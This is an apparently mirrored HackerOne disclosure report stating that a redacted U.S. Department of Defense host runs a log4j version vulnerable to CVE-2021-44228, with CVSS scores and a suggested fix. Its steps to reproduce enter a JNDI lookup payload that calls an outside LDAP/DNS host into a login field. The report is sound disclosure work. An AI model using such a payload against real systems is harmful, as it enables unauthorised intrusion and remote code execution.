Lucene search

K
hackeroneAlex_gaynorH1:1423496
HistoryDec 11, 2021 - 12:16 a.m.

U.S. Dept Of Defense: ██████████ running a vulnerable log4j

2021-12-1100:16:38
alex_gaynor
hackerone.com
100

10 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

9.3 High

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

0.976 High

EPSS

Percentile

100.0%

Description:

https://vulners.com/cve/CVE-2021-44228

Impact

Probably arbitrary code execution

System Host(s)

████████

Affected Product(s) and Version(s)

CVE Numbers

CVE-2021-44228

Steps to Reproduce

  1. Browse to https://████████/███████https%3A%2F%2F█████████%2F
  2. Enter a ${jndi:ldap://dns-server-yoi-control/a} into the username field
  3. Enter a random password
  4. Submit

Observe that a request was made to your DNS server. This strongly suggests a vulnerable log4j.

Suggested Mitigation/Remediation Actions

Update log4j or disable jndi support.

10 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

9.3 High

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

0.976 High

EPSS

Percentile

100.0%